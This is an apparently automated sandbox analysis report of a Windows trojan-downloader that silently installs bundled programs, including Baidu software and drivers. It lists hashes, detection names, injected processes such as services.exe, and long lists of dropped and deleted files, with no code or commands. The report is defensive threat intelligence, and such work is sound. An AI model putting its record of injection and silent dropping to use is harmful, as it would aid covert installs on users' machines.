Trojan.Win32.Agent.ahbpp (Kaspersky), Trojan.GenericKD.1780278 (B) (Emsisoft), Trojan.GenericKD.1780278 (AdAware), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.BHO.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: fb4f8f36fd1264269585743f34446bf2
SHA1: 2d346a8822cc01d2a95fa722bef226fca6c9661b
SHA256: a107d4e9f2af459bf1c1ee9146b3a5e2ce91bcc2ed78fc830cf279ba9a6ecbb6
SSDeep: 49152:Y7sthm3v/ms sKz34I07sPfZ2bzRYFBpNCUCPBG3Us:us833ms HcPsHwRYFBrgwks
Size: 1872747 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Eilio.-.Installer
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
wwwww_3340.exe:3720
vcredist_x86.exe:2720
netsh.exe:3112
bddownloader.exe:2984
guagua_77150006814.exe:1016
sc.exe:1336
sc.exe:644
BDDownloader.exe:2084
BDDownloader.exe:2804
MsiExec.exe:3196
candid.exe:1548
pczh_107_306.exe:828
baiduanTray.exe:2772
spkjrjp_30279.exe:1632
yymusic05.exe:2308
regsvr32.exe:3184
BDALeakfixer.exe:3640
BaiduAn.exe:3516
BaiduAn.exe:3208
BaiduAnSvc.exe:3884
BaiduAnSvc.exe:3732
oovmdw_70745.exe:444
BDASWAcc.exe:316
The Trojan injects its code into the following process(es):
bddownloader.exe:3936
bddownloader.exe:2820
%original file name%.exe:188
YFMSever.exe:2388
Ainqngz5.2.exe:1136
services.exe:756
Mutexes
The following mutexes were created/opened:
ShimCacheMutex
File activity
The process wwwww_3340.exe:3720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\yyfm0529.lnk (840 bytes)
%Program Files%\yyfm0529\2014081705\Data\version.ini (32 bytes)
%Program Files%\yyfm0529\2014081705\swresample-0.dll (3312 bytes)
%Program Files%\yyfm0529\2014081705\Data\user2.ini (40 bytes)
%Program Files%\yyfm0529\2014081705\yymusic05.exe (63950 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\¹Ù·½Ö÷Ò³.lnk (334 bytes)
%Program Files%\yyfm0529\2014081705\audio.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\pthreadGC2.dll (3616 bytes)
%Program Files%\yyfm0529\2014081705\avutil-52.dll (5520 bytes)
%Program Files%\yyfm0529\2014081705\Data\client.ini (36 bytes)
%Program Files%\yyfm0529\2014081705\favorfm.xml (440 bytes)
%Program Files%\yyfm0529\2014081705\DuiLib.dll (16288 bytes)
%Program Files%\yyfm0529\2014081705\Data\setup.ini (110 bytes)
%Program Files%\yyfm0529\2014081705\Data\dh.ini (56 bytes)
%Program Files%\yyfm0529\2014081705\channels.xml (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\yyfm0529\ÅäÖù¤¾ß\öÃâ€ÂØyyfm0529.lnk (830 bytes)
%Program Files%\yyfm0529\2014081705\libav.dll (6360 bytes)
%Program Files%\yyfm0529\2014081705\Unins.exe (9608 bytes)
%Program Files%\yyfm0529\2014081705\YFMSever.exe (23936 bytes)
%Program Files%\yyfm0529\2014081705\avcore.dll (2392 bytes)
%Program Files%\yyfm0529\2014081705\avcodec-54.dll (23936 bytes)
%Program Files%\yyfm0529\2014081705\source.dll (6584 bytes)
%Program Files%\yyfm0529\2014081705\SysConfig.ini (256 bytes)
%Program Files%\yyfm0529\2014081705\avformat-54.dll (12536 bytes)
The process vcredist_x86.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\crt.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP (0 bytes)
The process bddownloader.exe:2820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys.tmp.bdl (6441 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dnw.xml.tmp.bdl (241 bytes)
The process guagua_77150006814.exe:1016 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KKHHXWR3\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W3CLEEH4\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1J6GZEWA\desktop.ini (67 bytes)
The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\NSISdl.dll (14 bytes)
%Program Files%\updatr\tj.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (57025 bytes)
%Program Files%\updatr\oovmdw_70745.exe (51840 bytes)
%Program Files%\updatr\uboskin\config.ini (290 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\pczh_107_306.exe (57056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\adwoca_00005.exe (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\wwwww_3340.exe (413400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spkjrjp_30279.exe (230878 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\guagua_77150006814.exe (106373 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\sha (1 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\tqrlsimp27_dubo_001.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)
The process YFMSever.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (675 bytes)
The process BDDownloader.exe:2084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Baidu\BDDownload\107\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\dl.dll (14988 bytes)
%Program Files%\Common Files\Baidu\BDDownload\107\bdcomproxy.dll (601 bytes)
The process BDDownloader.exe:2804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst12.tmp (86466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.107.0[2014-8-17-5-21-45]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp\System.dll (784 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd11.tmp (0 bytes)
The process pczh_107_306.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.5.2\öÃâ€ÂØ.lnk (715 bytes)
%Program Files%\ainqngz5.2\candid.exe (5520 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\°®Çé.ÖÇ»Û.5.2\°®Çé.ÖÇ»Û.5.2.lnk (720 bytes)
%Program Files%\ainqngz5.2\uninstall.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd8.tmp (19409 bytes)
%Program Files%\ainqngz5.2\Ainqngz5.2.exe (4992 bytes)
%Program Files%\ainqngz5.2\schedule.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsB.tmp (6 bytes)
%Documents and Settings%\%current user%\Desktop\°®Çé.ÖÇ»Û.5.2.lnk (708 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460\YYM_955WD30.gif (1134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\Base64.dll (4 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsB.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso7.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\172014852040460\YYM_955WD30.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\nsA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd9.tmp\Base64.dll (0 bytes)
The process spkjrjp_30279.exe:1632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\hu.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDLogicUtils.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMSkin.dll (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh19.tmp (166951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMDownload.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\BDMNetGetInfo.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\tmpt5zprs.dll (95827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp\res\onlineWnd.zip (6360 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw1A.tmp (0 bytes)
The process yymusic05.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\a[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\stj[1].ashx (3 bytes)
%Program Files%\yyfm0529\2014081705\Data\server.ini (1 bytes)
%Program Files%\yyfm0529\2014081705\SysConfig.ini (440 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\tj[1].ashx (3 bytes)
%Program Files%\yyfm0529\2014081705\Data\user2.ini (402 bytes)
%Program Files%\yyfm0529\2014081705\Data\client.ini (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\ver[1].txt (36 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\stj[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\a[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\36IOCH3Y\tj[1].ashx (0 bytes)
The process BaiduAnSvc.exe:3884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\Cab16.tmp (54 bytes)
%System%\config\SYSTEM.LOG (7714 bytes)
%System%\config\software (95028 bytes)
%System%\config\SOFTWARE.LOG (76196 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db (145 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%WinDir%\Temp\Cab14.tmp (54 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db-journal (512 bytes)
%WinDir%\Temp\Tar17.tmp (2712 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%System%\drivers\BDEnhanceBoost.sys (48 bytes)
%System%\config\system (4478 bytes)
%System%\drivers\BDMWrench.sys (1346 bytes)
C:\$Directory (576 bytes)
%WinDir%\Temp\Tar15.tmp (2712 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BaiduAnCache.rptc (0 bytes)
%System%\drivers\BDMWrench.sys (0 bytes)
%WinDir%\Temp\Tar17.tmp (0 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\white_list.db-journal (0 bytes)
%WinDir%\Temp\Cab14.tmp (0 bytes)
%WinDir%\Temp\Cab16.tmp (0 bytes)
%WinDir%\Temp\Tar15.tmp (0 bytes)
The process oovmdw_70745.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnTray.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\BDMNetMonSusPlugin.dll (3721 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDSWShellExt.dll (1720 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\RTPPlugins\BDMSOAccServicePlugin.dll (1859 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepBase.dll (3897 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\sd\FileMon.dll (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\KVCommonRes.rdb (109 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysFixer.rdb (87 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSWNestCore.dll (6428 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTray.rdb (20 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度å«士\百度å«士.lnk (823 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Patch\publish.db (32763 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\vcredist_x86.exe (17629 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMSysFixerPlugin.dll (5442 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (40 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNetGetInfo.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMSkin.dll (36698 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMNetMon_XP_x86.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\ad.dll (6379 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\scan_mgr_config.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnBugRpt.exe (6437 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDNetMisc.dll (67 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDLogicUtils.dll (3811 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMStringUtils.dll (66 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnUpdate.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysOptDict.dat (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsusplugins\SusPluginContainerConfig.xml (605 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_property.dat (267 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDMNetMon_WIN7_x86.sys (94 bytes)
%System%\drivers\BDMNetMon.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOHomePageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMUpdate.rdb (1630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMDownload.dll (5520 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOSilentCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\BDArKit.sys (91 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SysAccLiveStrategy.dat (93 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\app.ico (1623 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\BDMSusPlugin.dll (3745 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDKVLogs.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageCleanerConfig.dat (12 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_acc.dat (3 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\PluginSetup.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\SysRepLib.dat (22 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\NetService.ini (590 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOPluginCleanerConfig.dat (442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMSOManagerPlugins\BDMSOAcceleratorPlugin.dll (6424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (111370 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixer.dll (267 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\BDMSOCleaner\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\TrustAndIso.dll (262 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\LocalPluginInfo.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\BDMCoolyPlugins\BDMSOAccCoolyPlugin.dll (1834 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_1_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SOTurbo.rdb (18 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCScriptBind.dll (3815 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\CommonRes.rdb (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerPreScan.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\PluginManager\PluginConfig.db (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\f2d00606824cd42a1c03eb9caa15e29f.bdt (631 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAnSvc.exe (7972 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMTips.rdb (183 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMsg.dll (49 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_num_2_speed.png (15 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (2132 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSWManagerFrame.dll (3725 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BaiduAn.exe (1683 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmtrayplugins\TrayPluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMScriptVM.dll (213 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\hips.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\BDMSetting.rdb (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\dl.dll (65930 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDDownloader.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll.bdl (386923 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASWAcc.exe (46 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMTinyXml.dll (181 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers_back\x86 (4 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDLogicUtils.dll.bdl (46921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\BDMNet.dll.bdl (32387 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\BDMSOLiveAccStrategyMgr.dll (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\res\onlineWnd.zip (14184 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMMainFrame.dll (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerConfig.dat (900 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SWManager.rdb (1812 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Tips\win8_1_minute_speed.png (15 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x86\bd0001.sys (70 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMSkin.dll (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\33f59beac1c942dd19f41a7fd30f3f9b.bdt (647 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\tmpjnmhqw.dll (27504 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\snczjmr.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\68905108990c088c31aead3b6d1651be.bdt (519 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SYSCleaner.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SORegCleanerScript.dat (14 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (5595 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMUpdate.dll (3729 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOTraceConfig.xml (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\a644398e96b2e49d735a01f51e447930.bdt (3 bytes)
%System%\drivers\bd0002.sys (1281 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\uninst.exe (9606 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDMCommon.dll (1609 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDCooly.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmpatcherplugins\BDMConnect.dll (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDASoftmgr.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSysFixer\PluginManager.dll (6359 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOCleanerCheckItem.dat (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\BDAFileHelper.exe (7386 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\BDMWrench.sys (833 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SiteInspection.rdb (1868 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\kav_compatible.dat (25 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bg_tips_speed_win8.png (4 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_class_filter.db (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSOManager\SOGarbageConfig.xml (14 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\bd0001.sys (601 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\drivers\x64\bd0002.sys (218 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SysAccelerator.rdb (1742 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDKitUtils.dll (62 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\FTSWManager\sw_repairproperty.dat (2 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\BDMSafePlugin.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmsafeplugins\BDMKVMainPlugin.dll (5442 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\bdmmainframeplugins\MainframePluginContainerConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMAVEng.dll (6420 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\GCCallbackBind.dll (24 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\bdmantivirus\BDMRepMgr.dll (3733 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\licenses\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\Skins\Default\SusPlugin.rdb (163 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\plugins\HotPlugins.xml (386 bytes)
